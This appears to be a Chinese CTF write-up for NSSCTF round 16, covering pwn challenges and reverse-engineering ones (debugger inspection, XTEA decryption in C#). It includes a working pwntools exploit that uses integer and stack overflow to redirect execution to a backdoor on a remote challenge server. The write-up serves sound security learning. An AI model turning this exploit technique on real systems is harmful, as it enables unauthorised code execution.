nssctfr16_wp
pwn
nc_pwnre
一个异或的逻辑, 异或后是一串base64编码,提交解码后的文本就进到shell了
a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]
for i in a:
print(chr(i ^ 0x10),end="")TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==
ret_text
__isoc99_scanf("%d", &v2);
if ( v2 < 0 && (v2 = -v2, v2 < 0) )-2147483648 进行 - 运算后会溢出,满足这个if的约束,能走到下边read,read那有一个栈溢出,覆盖返回地址为backdoor就好了
from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./ret_text_v0')
libc = elf.libc
is_debug = 0
if(is_debug):
p = process()
else:
ip = "node7.anna.nssctf.cn"
port = 28070
p = remote(ip,port)
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
payload = "-2147483648"
sla("Easy ret2text!!!Input:\n",payload)
payload = b'a' * (0x20 + 0x4) + p32(0x8049328)
sla("OK!!!You are right.\n",payload)
p.interactive()re
test your Debugger
打个断点去内存里面看一下flag就好了
CompileMe!!!
一眼 xtea,尝试编译了一下发现爆内存 vs崩溃了,有一个new ZZZ()的操作跟了一下,发现爆内存的原因是调用栈 栈帧太多了,写一个class zzz,然后再写一个getval的方法,直接把val计算出来就好了。
internal class Program
{
static void Main(string[] args)
{
var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
const ulong ___ = 0x9E3779B9;
var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
.GroupBy(____________ => ____________.Index / 2)
.Select(___________ =>
{
ulong _________ = ___________.ElementAt(0).Value;
ulong __________ = ___________.ElementAt(1).Value;
ulong _____________ = ___ * 32;
____.ToList().ForEach(_____________________ =>
{
__________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
_____________ -= ___;
_________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
});
return new[] { _________, __________ };
})
.SelectMany(______________ => ______________)
.ToArray();
Array.Copy(_____, __, __.Length);
__.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
//Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
//Try to compile me!!!
}
}一些文本处理的代码
# import re
# code = """
# //NET8.0
#
#
# namespace NSSCTF
# {
# internal class Program
# {
# static void Main(string[] args)
# {
# var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
# var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
# const ulong ___ = 0x9E3779B9;
# var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
#
# var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
# .GroupBy(____________ => ____________.Index / 2)
# .Select(___________ =>
# {
# ulong _________ = ___________.ElementAt(0).Value;
# ulong __________ = ___________.ElementAt(1).Value;
# ulong _____________ = ___ * 32;
#
# ____.ToList().ForEach(_____________________ =>
# {
# __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
# _____________ -= ___;
# _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
# });
# return new[] { _________, __________ };
# })
# .SelectMany(______________ => ______________)
# .ToArray();
#
# Array.Copy(_____, __, __.Length);
#
# __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
# //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
# //Try to compile me!!!
# .......
# }
# }
#
# abstract class _(ulong val)
# {
# public abstract ulong GetVal();
# }
#
# class A(ulong val) : _(val)
# {
# public override ulong GetVal()
# {
# return val + 0x79013C0BD7467DC;
# }
# }
#
# class B(ulong val) : A(val)
# {
# public override ulong GetVal()
# {
# base.GetVal();
# return val - 0x78D23D50E23FC98;
# }
# }
#
# class C(ulong val) : B(val)
# {
# """
# regex = r"return\s+val\s+([+-^])\s+(0x[a-fA-F0-9]+);"
# matches = re.findall(regex, code)
#
# for i in matches:
# print(i)
#
# data = """
# + 0x79013C0BD7467DC
# - 0x78D23D50E23FC98
# ^ 0x7E83D35728928CB
# - 0x4901E49CF9D63E8
# ^ 0x664DCA766EBA177
# + 0x7532EA705E8D596
# - 0x703A7337269BDED
# ^ 0x6FD783765C32290
# - 0x5A443D7480A09F7
#
#......
# """
#
# processed_data = ""
# for line in data.strip().split('\n'):
# operator, number = line.split(' ')
# processed_line = f"value {operator}= {number};\n"
# print(" " + processed_line)
执行后得到flag
using System.Reflection.Metadata.Ecma335;
using System.Text;
namespace NSSCTF
{
internal class Program
{
static void Main(string[] args)
{
var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
const ulong ___ = 0x9E3779B9;
var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
.GroupBy(____________ => ____________.Index / 2)
.Select(___________ =>
{
ulong _________ = ___________.ElementAt(0).Value;
ulong __________ = ___________.ElementAt(1).Value;
ulong _____________ = ___ * 32;
____.ToList().ForEach(_____________________ =>
{
__________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
_____________ -= ___;
_________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
});
return new[] { _________, __________ };
})
.SelectMany(______________ => ______________)
.ToArray();
Array.Copy(_____, __, __.Length);
__.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
//Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
//Try to compile me!!!
}
}
class ZZZ(ulong val)
{
ulong value = val;
public ulong GetVal()
{
value += 0x79013C0BD7467DC;
value -= 0x78D23D50E23FC98;
value ^= 0x7E83D35728928CB;
value -= 0x4901E49CF9D63E8;
value ^= 0x664DCA766EBA177;
value += 0x7532EA705E8D596;
value -= 0x703A7337269BDED;
......
}
}
}